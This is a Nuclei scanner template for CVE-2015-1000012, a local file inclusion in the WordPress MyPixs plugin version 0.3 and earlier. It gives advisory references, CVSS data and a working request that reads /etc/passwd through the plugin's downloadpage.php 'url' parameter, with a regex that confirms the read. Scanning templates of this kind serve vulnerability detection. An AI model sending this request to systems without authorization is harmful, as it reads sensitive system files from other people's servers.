my-nuclei-templates/CVE-2015-1000012.yaml

37 lines
1.1 KiB
YAML

id: CVE-2015-1000012
info:
name: WordPress MyPixs <=0.3 - Local File Inclusion
author: daffainfo
severity: high
description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
- http://www.vapidlabs.com/advisory.php?v=154
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000012
- http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-1000012
cwe-id: CWE-200
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/06